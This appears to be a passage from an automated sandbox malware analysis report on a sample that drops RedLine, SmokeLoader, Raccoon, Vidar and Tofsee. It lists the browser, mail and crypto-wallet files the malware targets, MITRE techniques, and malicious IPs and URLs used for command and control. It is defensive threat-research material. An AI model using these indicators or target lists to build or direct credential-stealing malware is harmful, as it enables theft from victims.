                          Source: Yara matchFile source: 0000000B.00000003.465535302.0000000000660000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000002.488137960.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000002.483029167.0000000000630000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000002.487496290.0000000000630000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000002.482701616.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 309C.exe PID: 5132, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: tejjnepq.exe PID: 2320, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4692, type: MEMORYSTR
                          Tries to steal Mail credentials (via file / registry access)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Microsoft Outlook Internet Settings
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
                          Found many strings related to Crypto-Wallets (likely being stolen)Show sources
                          Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                          Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmpString found in binary or memory: \ElectronCash\wallets\
                          Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmpString found in binary or memory: \Electrum\wallets\
                          Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmpString found in binary or memory: window-state.json
                          Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmpString found in binary or memory: \jaxx\Local Storage\
                          Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmpString found in binary or memory: exodus.conf.json
                          Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                          Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmpString found in binary or memory: info.seco
                          Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmpString found in binary or memory: ElectrumLTC
                          Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmpString found in binary or memory: \jaxx\Local Storage\
                          Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmpString found in binary or memory: passphrase.json
                          Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmpString found in binary or memory: \Ethereum\
                          Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmpString found in binary or memory: exodus.conf.json
                          Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmpString found in binary or memory: file__0.localstorage
                          Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmpString found in binary or memory: Ethereum
                          Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmpString found in binary or memory: default_wallet
                          Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmpString found in binary or memory: multidoge.wallet
                          Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmpString found in binary or memory: \Exodus\exodus.wallet\
                          Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmpString found in binary or memory: seed.seco
                          Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmpString found in binary or memory: keystore
                          Source: 2DB3.exe, 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmpString found in binary or memory: \Electrum-LTC\wallets\
                          Tries to harvest and steal browser information (history, passwords, etc)Show sources
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                          Source: C:\Users\user\AppData\Local\Temp\A7F0.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
                          Source: Yara matchFile source: 0000002E.00000002.664274182.00000000076A6000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002F.00000002.661388707.0000000003292000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 2DB3.exe PID: 5640, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: A7F0.exe PID: 2200, type: MEMORYSTR

                          Remote Access Functionality:

                          barindex
                          Yara detected RedLine StealerShow sources
                          Source: Yara matchFile source: 13.2.3F71.exe.370f910.1.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 28.0.3F71.exe.400000.12.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 28.0.3F71.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 28.0.3F71.exe.400000.8.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 28.0.3F71.exe.400000.10.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 13.2.3F71.exe.370f910.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 28.0.3F71.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000022.00000002.583256444.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002E.00000002.636412165.0000000000402000.00000020.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000022.00000003.582614206.0000000003702000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002E.00000002.652977998.0000000007300000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000000.502914721.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000002.595825107.00000000000C2000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000000.504088961.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000000.503538300.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002B.00000003.594002288.0000000003702000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.639820143.0000000000252000.00000020.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000D.00000002.509652789.00000000035F1000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002C.00000002.662009828.00000000066B0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001C.00000000.504557008.0000000000402000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000002F.00000002.661388707.0000000003292000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: dump.pcap, type: PCAP
                          Yara detected SmokeLoaderShow sources
                          Source: Yara matchFile source: 1.0.zmbGUZTICp.exe.400000.5.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 5.2.gdrgbdj.6515a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.1.zmbGUZTICp.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 6.1.gdrgbdj.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 6.2.gdrgbdj.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.zmbGUZTICp.exe.400000.6.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.2.zmbGUZTICp.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0.2.zmbGUZTICp.exe.6415a0.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 1.0.zmbGUZTICp.exe.400000.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000001.00000002.408517834.00000000005C1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000001.00000002.408471084.0000000000580000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000002.462828818.00000000020A1000.00000004.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000002.00000000.392111314.0000000004151000.00000020.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000006.00000002.462437704.0000000000460000.00000004.00000001.sdmp, type: MEMORY
                          Yara detected Raccoon StealerShow sources
                          Source: Yara matchFile source: 31.2.A7F0.exe.4d60e50.4.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.2.A7F0.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.3.A7F0.exe.4e00000.3.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.2.A7F0.exe.4d60e50.4.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.3.A7F0.exe.4e00000.3.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 31.2.A7F0.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000001F.00000002.640601105.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001F.00000002.662718681.0000000004D60000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001F.00000003.553585077.0000000004E00000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: A7F0.exe PID: 2200, type: MEMORYSTR
                          Yara detected Vidar stealerShow sources
                          Source: Yara matchFile source: 00000008.00000002.462596398.0000000000942000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 2DB3.exe PID: 5640, type: MEMORYSTR
                          Yara detected TofseeShow sources
                          Source: Yara matchFile source: 11.3.309C.exe.660000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.tejjnepq.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.3.tejjnepq.exe.650000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 27.2.svchost.exe.4d0000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.tejjnepq.exe.ed0000.2.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 27.2.svchost.exe.4d0000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.tejjnepq.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.tejjnepq.exe.ed0000.2.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 11.2.309C.exe.630e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 24.2.tejjnepq.exe.630e50.1.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 11.2.309C.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 11.2.309C.exe.400000.0.raw.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 00000018.00000003.484958252.0000000000650000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000002.487069234.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001B.00000002.639945191.00000000004D0000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000003.465535302.0000000000660000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000002.488137960.0000000000ED0000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000002.483029167.0000000000630000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000018.00000002.487496290.0000000000630000.00000040.00000001.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000000B.00000002.482701616.0000000000400000.00000040.00020000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: 309C.exe PID: 5132, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: tejjnepq.exe PID: 2320, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4692, type: MEMORYSTR
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: 11_2_004088AF CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,
                          Source: C:\Users\user\AppData\Local\Temp\309C.exeCode function: 11_2_004088B0 CreateThread,CreateThread,send,recv,socket,connect,closesocket,setsockopt,bind,listen,accept,select,getpeername,getsockname,

                          Mitre Att&ck Matrix

                          Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                          Valid Accounts1Native API531DLL Side-Loading1DLL Side-Loading1Disable or Modify Tools211OS Credential Dumping1System Time Discovery2Remote ServicesArchive Collected Data11Exfiltration Over Other Network MediumIngress Tool Transfer15Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                          Default AccountsExploitation for Client Execution1Valid Accounts1Valid Accounts1Deobfuscate/Decode Files or Information11Input Capture1Account Discovery1Remote Desktop ProtocolData from Local System2Exfiltration Over BluetoothEncrypted Channel22Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                          Domain AccountsCommand and Scripting Interpreter3Windows Service14Access Token Manipulation1Obfuscated Files or Information3Security Account ManagerFile and Directory Discovery3SMB/Windows Admin SharesEmail Collection1Automated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                          Local AccountsScheduled Task/Job1Scheduled Task/Job1Windows Service14Software Packing33NTDSSystem Information Discovery438Distributed Component Object ModelInput Capture1Scheduled TransferNon-Application Layer Protocol5SIM Card SwapCarrier Billing Fraud
                          Cloud AccountsService Execution3Network Logon ScriptProcess Injection713Timestomp1LSA SecretsSecurity Software Discovery661SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol36Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                          Replication Through Removable MediaLaunchdRc.commonScheduled Task/Job1DLL Side-Loading1Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                          External Remote ServicesScheduled TaskStartup ItemsStartup ItemsFile Deletion1DCSyncVirtualization/Sandbox Evasion241Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                          Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobMasquerading131Proc FilesystemApplication Window Discovery1Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                          Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Valid Accounts1/etc/passwd and /etc/shadowSystem Owner/User Discovery1Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                          Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)Modify Registry1Network SniffingRemote System Discovery1Taint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact
                          Compromise Software Dependencies and Development ToolsWindows Command ShellCronCronAccess Token Manipulation1Input CapturePermission Groups DiscoveryReplication Through Removable MediaRemote Data StagingExfiltration Over Physical MediumMail ProtocolsService Stop
                          Compromise Software Supply ChainUnix ShellLaunchdLaunchdVirtualization/Sandbox Evasion241KeyloggingLocal GroupsComponent Object Model and Distributed COMScreen CaptureExfiltration over USBDNSInhibit System Recovery
                          Compromise Hardware Supply ChainVisual BasicScheduled TaskScheduled TaskProcess Injection713GUI Input CaptureDomain GroupsExploitation of Remote ServicesEmail CollectionCommonly Used PortProxyDefacement
                          Trusted RelationshipPythonHypervisorProcess InjectionHidden Files and Directories1Web Portal CaptureCloud GroupsAttack PC via USB ConnectionLocal Email CollectionStandard Application Layer ProtocolInternal ProxyInternal Defacement

                          Behavior Graph

                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 553117 Sample: zmbGUZTICp.exe Startdate: 14/01/2022 Architecture: WINDOWS Score: 100 93 185.215.113.35, 49766, 49767, 49771 WHOLESALECONNECTIONSNL Portugal 2->93 95 patmushta.info 2->95 97 microsoft-com.mail.protection.outlook.com 2->97 127 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->127 129 Multi AV Scanner detection for domain / URL 2->129 131 Antivirus detection for URL or domain 2->131 133 23 other signatures 2->133 11 zmbGUZTICp.exe 2->11         started        14 tejjnepq.exe 2->14         started        16 gdrgbdj 2->16         started        18 3 other processes 2->18 signatures3 process4 dnsIp5 167 Contains functionality to inject code into remote processes 11->167 169 Injects a PE file into a foreign processes 11->169 21 zmbGUZTICp.exe 11->21         started        171 Detected unpacking (changes PE section rights) 14->171 173 Detected unpacking (overwrites its own PE header) 14->173 175 Writes to foreign memory regions 14->175 177 Allocates memory in foreign processes 14->177 24 svchost.exe 14->24         started        27 gdrgbdj 16->27         started        99 127.0.0.1 unknown unknown 18->99 29 WerFault.exe 18->29         started        signatures6 process7 dnsIp8 157 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 21->157 159 Maps a DLL or memory area into another process 21->159 161 Checks if the current machine is a virtual machine (disk enumeration) 21->161 31 explorer.exe 10 21->31 injected 103 microsoft-com.mail.protection.outlook.com 40.93.207.0, 25, 49726 MICROSOFT-CORP-MSN-AS-BLOCKUS United States 24->103 105 patmushta.info 94.142.143.116, 443, 49728, 49778 IHOR-ASRU Russian Federation 24->105 163 System process connects to network (likely due to code injection or exploit) 24->163 165 Creates a thread in another existing process (thread injection) 27->165 signatures9 process10 dnsIp11 113 185.233.81.115, 443, 49703 SUPERSERVERSDATACENTERRU Russian Federation 31->113 115 188.166.28.199, 80 DIGITALOCEAN-ASNUS Netherlands 31->115 117 11 other IPs or domains 31->117 73 C:\Users\user\AppData\Roaming\gdrgbdj, PE32 31->73 dropped 75 C:\Users\user\AppData\Local\Temp\A7F0.exe, PE32 31->75 dropped 77 C:\Users\user\AppData\Local\Temp\3F71.exe, PE32 31->77 dropped 79 9 other files (7 malicious) 31->79 dropped 119 System process connects to network (likely due to code injection or exploit) 31->119 121 Benign windows process drops PE files 31->121 123 Deletes itself after installation 31->123 125 Hides that the sample has been downloaded from the Internet (zone.identifier) 31->125 36 2DB3.exe 31->36         started        39 309C.exe 2 31->39         started        42 A7F0.exe 31->42         started        45 2 other processes 31->45 file12 signatures13 process14 dnsIp15 135 Detected unpacking (changes PE section rights) 36->135 137 Detected unpacking (overwrites its own PE header) 36->137 139 Found evasive API chain (may stop execution after checking mutex) 36->139 155 4 other signatures 36->155 81 C:\Users\user\AppData\Local\...\tejjnepq.exe, PE32 39->81 dropped 141 Machine Learning detection for dropped file 39->141 143 Uses netsh to modify the Windows network and firewall settings 39->143 145 Modifies the windows firewall 39->145 47 cmd.exe 1 39->47         started        50 cmd.exe 2 39->50         started        52 sc.exe 1 39->52         started        59 3 other processes 39->59 107 185.163.45.70, 80 MIVOCLOUDMD Moldova Republic of 42->107 109 185.163.204.22, 49775, 80 CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE Germany 42->109 111 185.163.204.24, 49776, 80 CAUCASUS-CABLE-SYSTEMCCSAutonomousSystemGE Germany 42->111 83 C:\Users\user\AppData\LocalLow\sqlite3.dll, PE32 42->83 dropped 85 C:\Users\user\AppData\...\vcruntime140.dll, PE32 42->85 dropped 87 C:\Users\user\AppData\...\ucrtbase.dll, PE32 42->87 dropped 89 15 other files (none is malicious) 42->89 dropped 147 Tries to steal Mail credentials (via file / registry access) 42->147 149 Tries to harvest and steal browser information (history, passwords, etc) 42->149 151 Antivirus detection for dropped file 45->151 153 Injects a PE file into a foreign processes 45->153 54 3F71.exe 45->54         started        57 WerFault.exe 20 9 45->57         started        file16 signatures17 process18 dnsIp19 91 C:\Windows\SysWOW64\...\tejjnepq.exe (copy), PE32 47->91 dropped 61 conhost.exe 47->61         started        63 conhost.exe 50->63         started        65 conhost.exe 52->65         started        101 86.107.197.138, 38133, 49764 MOD-EUNL Romania 54->101 67 conhost.exe 59->67         started        69 conhost.exe 59->69         started        71 conhost.exe 59->71         started        file20 process21

                          Screenshots

                          Thumbnails

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.

                          windows-stand

                          Antivirus, Machine Learning and Genetic Malware Detection

                          Initial Sample

                          SourceDetectionScannerLabelLink
                          zmbGUZTICp.exe35%VirustotalBrowse
                          zmbGUZTICp.exe42%ReversingLabsWin32.Trojan.Casdet
                          zmbGUZTICp.exe100%Joe Sandbox ML

                          Dropped Files

                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\3F71.exe100%AviraHEUR/AGEN.1211353
                          C:\Users\user\AppData\Local\Temp\239.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\2D04.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\309C.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1E7F.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\2DB3.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\1D34.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\Local\Temp\3F71.exe100%Joe Sandbox ML
                          C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleHandler.dll0%MetadefenderBrowse
                          C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleHandler.dll0%ReversingLabs
                          C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleMarshal.dll0%MetadefenderBrowse
                          C:\Users\user\AppData\LocalLow\sG8rM8v\AccessibleMarshal.dll0%ReversingLabs
                          C:\Users\user\AppData\LocalLow\sG8rM8v\IA2Marshal.dll3%MetadefenderBrowse
                          C:\Users\user\AppData\LocalLow\sG8rM8v\IA2Marshal.dll0%ReversingLabs
                          C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy.dll0%MetadefenderBrowse
                          C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy.dll0%ReversingLabs
                          C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy_InUse.dll0%MetadefenderBrowse
                          C:\Users\user\AppData\LocalLow\sG8rM8v\MapiProxy_InUse.dll0%ReversingLabs
                          C:\Users\user\AppData\LocalLow\sG8rM8v\breakpadinjector.dll0%MetadefenderBrowse
                          C:\Users\user\AppData\LocalLow\sG8rM8v\breakpadinjector.dll0%ReversingLabs
                          C:\Users\user\AppData\LocalLow\sG8rM8v\freebl3.dll0%MetadefenderBrowse
                          C:\Users\user\AppData\LocalLow\sG8rM8v\freebl3.dll0%ReversingLabs
                          C:\Users\user\AppData\LocalLow\sG8rM8v\ldap60.dll0%MetadefenderBrowse
                          C:\Users\user\AppData\LocalLow\sG8rM8v\ldap60.dll2%ReversingLabs
                          C:\Users\user\AppData\LocalLow\sG8rM8v\ldif60.dll0%MetadefenderBrowse
                          C:\Users\user\AppData\LocalLow\sG8rM8v\ldif60.dll0%ReversingLabs

                          Unpacked PE Files

                          SourceDetectionScannerLabelLinkDownload
                          28.0.3F71.exe.fa0000.11.unpack100%AviraHEUR/AGEN.1211353Download File
                          1.0.zmbGUZTICp.exe.400000.1.unpack100%AviraHEUR/AGEN.1123244Download File
                          28.0.3F71.exe.400000.12.unpack100%AviraHEUR/AGEN.1145065Download File
                          28.0.3F71.exe.400000.8.unpack100%AviraHEUR/AGEN.1145065Download File
                          13.2.3F71.exe.130000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                          24.3.tejjnepq.exe.650000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                          13.0.3F71.exe.130000.1.unpack100%AviraHEUR/AGEN.1211353Download File
                          7.0.1E7F.exe.2080e50.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          8.2.2DB3.exe.630e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                          1.0.zmbGUZTICp.exe.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          6.0.gdrgbdj.400000.5.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          28.0.3F71.exe.fa0000.1.unpack100%AviraHEUR/AGEN.1211353Download File
                          28.0.3F71.exe.400000.4.unpack100%AviraHEUR/AGEN.1145065Download File
                          24.2.tejjnepq.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                          28.0.3F71.exe.fa0000.3.unpack100%AviraHEUR/AGEN.1211353Download File
                          28.0.3F71.exe.400000.10.unpack100%AviraHEUR/AGEN.1145065Download File
                          7.2.1E7F.exe.2080e50.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          11.2.309C.exe.630e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                          28.0.3F71.exe.fa0000.9.unpack100%AviraHEUR/AGEN.1211353Download File
                          0.2.zmbGUZTICp.exe.6415a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          28.0.3F71.exe.fa0000.13.unpack100%AviraHEUR/AGEN.1211353Download File
                          6.0.gdrgbdj.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          1.1.zmbGUZTICp.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          31.3.A7F0.exe.4d10000.2.unpack100%AviraTR/Crypt.EPACK.Gen2Download File
                          6.1.gdrgbdj.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          1.0.zmbGUZTICp.exe.400000.0.unpack100%AviraHEUR/AGEN.1123244Download File
                          8.2.2DB3.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          8.3.2DB3.exe.650000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                          27.2.svchost.exe.4d0000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                          11.3.309C.exe.660000.0.unpack100%AviraTR/Patched.Ren.GenDownload File
                          6.2.gdrgbdj.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          1.0.zmbGUZTICp.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          5.2.gdrgbdj.6515a0.1.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          1.0.zmbGUZTICp.exe.400000.3.unpack100%AviraHEUR/AGEN.1123244Download File
                          31.2.A7F0.exe.400000.0.unpack100%AviraHEUR/AGEN.1127993Download File
                          28.0.3F71.exe.fa0000.2.unpack100%AviraHEUR/AGEN.1211353Download File
                          24.2.tejjnepq.exe.630e50.1.unpack100%AviraTR/Patched.Ren.GenDownload File
                          13.0.3F71.exe.130000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                          6.0.gdrgbdj.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          24.2.tejjnepq.exe.ed0000.2.unpack100%AviraBDS/Backdoor.GenDownload File
                          7.0.1E7F.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          7.2.1E7F.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          7.0.1E7F.exe.400000.6.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          28.0.3F71.exe.400000.6.unpack100%AviraHEUR/AGEN.1145065Download File
                          7.0.1E7F.exe.2080e50.7.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          28.0.3F71.exe.fa0000.7.unpack100%AviraHEUR/AGEN.1211353Download File
                          11.2.309C.exe.400000.0.unpack100%AviraBDS/Backdoor.GenDownload File
                          13.0.3F71.exe.130000.3.unpack100%AviraHEUR/AGEN.1211353Download File
                          28.0.3F71.exe.fa0000.0.unpack100%AviraHEUR/AGEN.1211353Download File
                          1.0.zmbGUZTICp.exe.400000.2.unpack100%AviraHEUR/AGEN.1123244Download File
                          1.2.zmbGUZTICp.exe.400000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          13.0.3F71.exe.130000.2.unpack100%AviraHEUR/AGEN.1211353Download File
                          1.0.zmbGUZTICp.exe.400000.4.unpack100%AviraTR/Crypt.XPACK.GenDownload File
                          28.0.3F71.exe.fa0000.5.unpack100%AviraHEUR/AGEN.1211353Download File
                          7.3.1E7F.exe.2090000.0.unpack100%AviraTR/Crypt.XPACK.GenDownload File

                          Domains

                          No Antivirus matches

                          URLs

                          SourceDetectionScannerLabelLink
                          http://185.163.45.70/capibar12%VirustotalBrowse
                          http://185.163.45.70/capibar100%Avira URL Cloudphishing
                          http://185.7.214.171:8080/6.php100%URL Reputationmalware
